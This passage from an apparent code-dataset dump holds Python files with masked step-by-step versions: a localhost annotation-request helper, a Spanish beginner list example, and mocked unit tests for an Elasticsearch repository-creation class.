"step-2": "<mask token>\n\n\nclass RequestAnnotation:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass RequestAnnotation:\n\n def schedule(self, command: str, **kwargs):\n response = requests.post(url=\n f'http://localhost:{config.annotation_port}/{command}', json=kwargs\n )\n return json.loads(response.text)\n",
"step-4": "import json\nimport requests\nimport config\n\n\nclass RequestAnnotation:\n\n def schedule(self, command: str, **kwargs):\n response = requests.post(url=\n f'http://localhost:{config.annotation_port}/{command}', json=kwargs\n )\n return json.loads(response.text)\n",
"step-5": "import json\n\nimport requests\nimport config\n\nclass RequestAnnotation:\n def schedule(self,\n command: str,\n **kwargs):\n response = requests.post(url=f\"http://localhost:{config.annotation_port}/{command}\",\n json=kwargs)\n\n # not 'text' for annotating, but 'text' of response is meant here:\n return json.loads(response.text)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(miLista)
<|reserved_special_token_0|>
print(miLista)
miLista.append('NuevoDato')
print(miLista)
<|reserved_special_token_1|>
miLista = ['cadena', 21, 2.8, 'nuevo dato', 25]
print(miLista)
miLista[2] = 3.8
print(miLista)
miLista.append('NuevoDato')
print(miLista)
<|reserved_special_token_1|>
#Las listas son similares a las tuplas
# con la diferencia de que permiten modificar los datos una vez creados
miLista = ['cadena', 21, 2.8, 'nuevo dato', 25]
print (miLista)
miLista[2] = 3.8 #el tercer elemento ahora es 3.8
print(miLista)
miLista.append('NuevoDato')
print(miLista)
|
flexible
|
{
"blob_id": "27ec06d084bf819383801be0351c04e7d1fc1752",
"index": 5176,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(miLista)\n<mask token>\nprint(miLista)\nmiLista.append('NuevoDato')\nprint(miLista)\n",
"step-3": "miLista = ['cadena', 21, 2.8, 'nuevo dato', 25]\nprint(miLista)\nmiLista[2] = 3.8\nprint(miLista)\nmiLista.append('NuevoDato')\nprint(miLista)\n",
"step-4": "#Las listas son similares a las tuplas\n# con la diferencia de que permiten modificar los datos una vez creados\nmiLista = ['cadena', 21, 2.8, 'nuevo dato', 25]\nprint (miLista)\nmiLista[2] = 3.8 #el tercer elemento ahora es 3.8\nprint(miLista)\nmiLista.append('NuevoDato')\nprint(miLista)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/python
# Classification (U)
"""Program: elasticsearchrepo_create_repo.py
Description: Unit testing of create_repo in
elastic_class.ElasticSearchRepo class.
Usage:
test/unit/elastic_class/elasticsearchrepo_create_repo.py
Arguments:
"""
# Libraries and Global Variables
# Standard
import sys
import os
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
# Third-party
import mock
# Local
sys.path.append(os.getcwd())
import elastic_class
import version
__version__ = version.__version__
class Elasticsearch(object):
"""Class: ElasticSearch
Description: Class representation of the Elasticsearch class.
Methods:
__init__
"""
def __init__(self, host_list, port=9200):
"""Method: __init__
Description: Initialization instance of the class.
Arguments:
"""
self.hosts = host_list
self.port = port
self.info_status = {"cluster_name": "ClusterName",
"name": "servername"}
class UnitTest(unittest.TestCase):
"""Class: UnitTest
Description: Class which is a representation of a unit testing.
Methods:
setUp
test_not_created_repo
test_not_detected_repo
test_missing_repo_name
test_no_repo_dir
test_no_repo_name
test_default
"""
def setUp(self):
"""Function: setUp
Description: Initialization for unit testing.
Arguments:
"""
self.host_list = ["host1", "host2"]
self.repo = "reponame"
self.repo2 = "reponame2"
self.repo3 = "reponame3"
self.els = Elasticsearch(self.host_list)
self.repo_dir = "/dir/path/dump2"
self.nodes_data = {"serverid1": {"name": "hostname1", "settings":
{"path": {"data": ["/dir/data1"],
"logs": ["/dir/logs1"]}}},
"serverid2": {"name": "hostname2", "settings":
{"path": {"data": ["/dir/data2"],
"logs": ["/dir/logs2"]}}}}
self.health_data = {"status": "green", "cluster_name": "ClusterName"}
self.dump = "/dir/path/dump"
self.repo_list = {"reponame": {"type": "dbdump", "settings":
{"location": self.dump}}}
self.repo_dict = {"reponame": {"type": "dbdump", "settings":
{"location": self.dump}}}
self.repo_dict2 = {"reponame": {"type": "dbdump", "settings":
{"location": self.dump}},
"reponame2": {"type": "dbdump", "settings":
{"location": "/dir/path/dump2"}}}
@mock.patch("elastic_class.create_snapshot_repo",
mock.Mock(return_value={"acknowledged": False}))
@mock.patch("elastic_class.ElasticSearch.update_status",
mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_not_created_repo(self, mock_es, mock_repo):
"""Function: test_not_created_repo
Description: Test with repository not created.
Arguments:
"""
mock_es.return_value = self.els
mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
repo_dir=self.repo_dir)
els.connect()
els.repo_name = None
self.assertEqual(
els.create_repo(self.repo3, self.repo_dir),
(True,
"ERROR: Repository creation failure: " +
" reponame3, /dir/path/dump2"))
@mock.patch("elastic_class.create_snapshot_repo",
mock.Mock(return_value={"acknowledged": True}))
@mock.patch("elastic_class.ElasticSearch.update_status",
mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_not_detected_repo(self, mock_es, mock_repo):
"""Function: test_not_detected_repo
Description: Test with repository not detected.
Arguments:
"""
mock_es.return_value = self.els
mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
repo_dir=self.repo_dir)
els.connect()
els.repo_name = None
self.assertEqual(
els.create_repo(self.repo3, self.repo_dir),
(True,
"ERROR: Repository not detected: reponame3, /dir/path/dump2"))
@mock.patch("elastic_class.create_snapshot_repo",
mock.Mock(return_value={"acknowledged": False}))
@mock.patch("elastic_class.ElasticSearch.update_status",
mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_missing_repo_name(self, mock_es, mock_repo):
"""Function: test_missing_repo_name
Description: Test with missing repo named.
Arguments:
"""
mock_es.return_value = self.els
mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
repo_dir=self.repo_dir)
els.connect()
els.repo = None
self.assertEqual(
els.create_repo(repo_dir=self.repo_dir),
(True,
"ERROR: Missing repo name or" +
" directory: 'None', '/dir/path/dump2'"))
@mock.patch("elastic_class.create_snapshot_repo",
mock.Mock(return_value={"acknowledged": True}))
@mock.patch("elastic_class.ElasticSearch.update_status",
mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_no_repo_dir(self, mock_es, mock_repo):
"""Function: test_no_repo_dir
Description: Test with no repo directory passed.
Arguments:
"""
mock_es.return_value = self.els
mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
repo_dir=self.repo_dir)
els.connect()
self.assertEqual(els.create_repo(self.repo), (False, None))
self.assertEqual(els.repo_dict, self.repo_dict2)
@mock.patch("elastic_class.create_snapshot_repo",
mock.Mock(return_value={"acknowledged": True}))
@mock.patch("elastic_class.ElasticSearch.update_status",
mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_no_repo_name(self, mock_es, mock_repo):
"""Function: test_no_repo_name
Description: Test with no repo named passed.
Arguments:
"""
mock_es.return_value = self.els
mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo2,
repo_dir=self.repo_dir)
els.connect()
self.assertEqual(els.create_repo(repo_dir=self.repo_dir),
(False, None))
self.assertEqual(els.repo_dict, self.repo_dict2)
@mock.patch("elastic_class.create_snapshot_repo",
mock.Mock(return_value={"acknowledged": True}))
@mock.patch("elastic_class.ElasticSearch.update_status",
mock.Mock(return_value=True))
@mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
@mock.patch("elastic_class.get_repo_list")
@mock.patch("elastic_class.elasticsearch.Elasticsearch")
def test_default(self, mock_es, mock_repo):
"""Function: test_default
Description: Test with default settings.
Arguments:
"""
mock_es.return_value = self.els
mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
repo_dir=self.repo_dir)
els.connect()
self.assertEqual(els.create_repo(self.repo2, self.repo_dir),
(False, None))
self.assertEqual(els.repo_dict, self.repo_dict2)
if __name__ == "__main__":
unittest.main()
|
normal
|
{
"blob_id": "5c01b83634b7ae9bc691341d7432a4e59617444c",
"index": 5182,
"step-1": "<mask token>\n\n\nclass Elasticsearch(object):\n <mask token>\n <mask token>\n\n\nclass UnitTest(unittest.TestCase):\n \"\"\"Class: UnitTest\n\n Description: Class which is a representation of a unit testing.\n\n Methods:\n setUp\n test_not_created_repo\n test_not_detected_repo\n test_missing_repo_name\n test_no_repo_dir\n test_no_repo_name\n test_default\n\n \"\"\"\n\n def setUp(self):\n \"\"\"Function: setUp\n\n Description: Initialization for unit testing.\n\n Arguments:\n\n \"\"\"\n self.host_list = ['host1', 'host2']\n self.repo = 'reponame'\n self.repo2 = 'reponame2'\n self.repo3 = 'reponame3'\n self.els = Elasticsearch(self.host_list)\n self.repo_dir = '/dir/path/dump2'\n self.nodes_data = {'serverid1': {'name': 'hostname1', 'settings': {\n 'path': {'data': ['/dir/data1'], 'logs': ['/dir/logs1']}}},\n 'serverid2': {'name': 'hostname2', 'settings': {'path': {'data':\n ['/dir/data2'], 'logs': ['/dir/logs2']}}}}\n self.health_data = {'status': 'green', 'cluster_name': 'ClusterName'}\n self.dump = '/dir/path/dump'\n self.repo_list = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}}\n self.repo_dict = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}}\n self.repo_dict2 = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}, 'reponame2': {'type': 'dbdump',\n 'settings': {'location': '/dir/path/dump2'}}}\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': False}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_not_created_repo(self, mock_es, mock_repo):\n \"\"\"Function: test_not_created_repo\n\n Description: Test with repository not created.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(els.create_repo(self.repo3, self.repo_dir), (True,\n 'ERROR: Repository creation failure: ' +\n ' reponame3, /dir/path/dump2'))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_not_detected_repo(self, mock_es, mock_repo):\n \"\"\"Function: test_not_detected_repo\n\n Description: Test with repository not detected.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(els.create_repo(self.repo3, self.repo_dir), (True,\n 'ERROR: Repository not detected: reponame3, /dir/path/dump2'))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': False}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_missing_repo_name(self, mock_es, mock_repo):\n \"\"\"Function: test_missing_repo_name\n\n Description: Test with missing repo named.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo = None\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir), (True, \n 'ERROR: Missing repo name or' +\n \" directory: 'None', '/dir/path/dump2'\"))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_no_repo_dir(self, mock_es, mock_repo):\n \"\"\"Function: test_no_repo_dir\n\n Description: Test with no repo directory passed.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo), (False, None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_no_repo_name(self, mock_es, mock_repo):\n \"\"\"Function: test_no_repo_name\n\n Description: Test with no repo named passed.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo2, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir), (False, None)\n )\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_default(self, mock_es, mock_repo):\n \"\"\"Function: test_default\n\n Description: Test with default settings.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo2, self.repo_dir), (False,\n None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Elasticsearch(object):\n \"\"\"Class: ElasticSearch\n\n Description: Class representation of the Elasticsearch class.\n\n Methods:\n __init__\n\n \"\"\"\n\n def __init__(self, host_list, port=9200):\n \"\"\"Method: __init__\n\n Description: Initialization instance of the class.\n\n Arguments:\n\n \"\"\"\n self.hosts = host_list\n self.port = port\n self.info_status = {'cluster_name': 'ClusterName', 'name': 'servername'\n }\n\n\nclass UnitTest(unittest.TestCase):\n \"\"\"Class: UnitTest\n\n Description: Class which is a representation of a unit testing.\n\n Methods:\n setUp\n test_not_created_repo\n test_not_detected_repo\n test_missing_repo_name\n test_no_repo_dir\n test_no_repo_name\n test_default\n\n \"\"\"\n\n def setUp(self):\n \"\"\"Function: setUp\n\n Description: Initialization for unit testing.\n\n Arguments:\n\n \"\"\"\n self.host_list = ['host1', 'host2']\n self.repo = 'reponame'\n self.repo2 = 'reponame2'\n self.repo3 = 'reponame3'\n self.els = Elasticsearch(self.host_list)\n self.repo_dir = '/dir/path/dump2'\n self.nodes_data = {'serverid1': {'name': 'hostname1', 'settings': {\n 'path': {'data': ['/dir/data1'], 'logs': ['/dir/logs1']}}},\n 'serverid2': {'name': 'hostname2', 'settings': {'path': {'data':\n ['/dir/data2'], 'logs': ['/dir/logs2']}}}}\n self.health_data = {'status': 'green', 'cluster_name': 'ClusterName'}\n self.dump = '/dir/path/dump'\n self.repo_list = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}}\n self.repo_dict = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}}\n self.repo_dict2 = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}, 'reponame2': {'type': 'dbdump',\n 'settings': {'location': '/dir/path/dump2'}}}\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': False}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_not_created_repo(self, mock_es, mock_repo):\n \"\"\"Function: test_not_created_repo\n\n Description: Test with repository not created.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(els.create_repo(self.repo3, self.repo_dir), (True,\n 'ERROR: Repository creation failure: ' +\n ' reponame3, /dir/path/dump2'))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_not_detected_repo(self, mock_es, mock_repo):\n \"\"\"Function: test_not_detected_repo\n\n Description: Test with repository not detected.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(els.create_repo(self.repo3, self.repo_dir), (True,\n 'ERROR: Repository not detected: reponame3, /dir/path/dump2'))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': False}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_missing_repo_name(self, mock_es, mock_repo):\n \"\"\"Function: test_missing_repo_name\n\n Description: Test with missing repo named.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo = None\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir), (True, \n 'ERROR: Missing repo name or' +\n \" directory: 'None', '/dir/path/dump2'\"))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_no_repo_dir(self, mock_es, mock_repo):\n \"\"\"Function: test_no_repo_dir\n\n Description: Test with no repo directory passed.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo), (False, None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_no_repo_name(self, mock_es, mock_repo):\n \"\"\"Function: test_no_repo_name\n\n Description: Test with no repo named passed.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo2, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir), (False, None)\n )\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_default(self, mock_es, mock_repo):\n \"\"\"Function: test_default\n\n Description: Test with default settings.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo2, self.repo_dir), (False,\n None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n\n<mask token>\n",
"step-3": "<mask token>\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n<mask token>\nsys.path.append(os.getcwd())\n<mask token>\n\n\nclass Elasticsearch(object):\n \"\"\"Class: ElasticSearch\n\n Description: Class representation of the Elasticsearch class.\n\n Methods:\n __init__\n\n \"\"\"\n\n def __init__(self, host_list, port=9200):\n \"\"\"Method: __init__\n\n Description: Initialization instance of the class.\n\n Arguments:\n\n \"\"\"\n self.hosts = host_list\n self.port = port\n self.info_status = {'cluster_name': 'ClusterName', 'name': 'servername'\n }\n\n\nclass UnitTest(unittest.TestCase):\n \"\"\"Class: UnitTest\n\n Description: Class which is a representation of a unit testing.\n\n Methods:\n setUp\n test_not_created_repo\n test_not_detected_repo\n test_missing_repo_name\n test_no_repo_dir\n test_no_repo_name\n test_default\n\n \"\"\"\n\n def setUp(self):\n \"\"\"Function: setUp\n\n Description: Initialization for unit testing.\n\n Arguments:\n\n \"\"\"\n self.host_list = ['host1', 'host2']\n self.repo = 'reponame'\n self.repo2 = 'reponame2'\n self.repo3 = 'reponame3'\n self.els = Elasticsearch(self.host_list)\n self.repo_dir = '/dir/path/dump2'\n self.nodes_data = {'serverid1': {'name': 'hostname1', 'settings': {\n 'path': {'data': ['/dir/data1'], 'logs': ['/dir/logs1']}}},\n 'serverid2': {'name': 'hostname2', 'settings': {'path': {'data':\n ['/dir/data2'], 'logs': ['/dir/logs2']}}}}\n self.health_data = {'status': 'green', 'cluster_name': 'ClusterName'}\n self.dump = '/dir/path/dump'\n self.repo_list = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}}\n self.repo_dict = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}}\n self.repo_dict2 = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}, 'reponame2': {'type': 'dbdump',\n 'settings': {'location': '/dir/path/dump2'}}}\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': False}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_not_created_repo(self, mock_es, mock_repo):\n \"\"\"Function: test_not_created_repo\n\n Description: Test with repository not created.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(els.create_repo(self.repo3, self.repo_dir), (True,\n 'ERROR: Repository creation failure: ' +\n ' reponame3, /dir/path/dump2'))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_not_detected_repo(self, mock_es, mock_repo):\n \"\"\"Function: test_not_detected_repo\n\n Description: Test with repository not detected.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(els.create_repo(self.repo3, self.repo_dir), (True,\n 'ERROR: Repository not detected: reponame3, /dir/path/dump2'))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': False}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_missing_repo_name(self, mock_es, mock_repo):\n \"\"\"Function: test_missing_repo_name\n\n Description: Test with missing repo named.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo = None\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir), (True, \n 'ERROR: Missing repo name or' +\n \" directory: 'None', '/dir/path/dump2'\"))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_no_repo_dir(self, mock_es, mock_repo):\n \"\"\"Function: test_no_repo_dir\n\n Description: Test with no repo directory passed.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo), (False, None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_no_repo_name(self, mock_es, mock_repo):\n \"\"\"Function: test_no_repo_name\n\n Description: Test with no repo named passed.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo2, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir), (False, None)\n )\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_default(self, mock_es, mock_repo):\n \"\"\"Function: test_default\n\n Description: Test with default settings.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo2, self.repo_dir), (False,\n None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
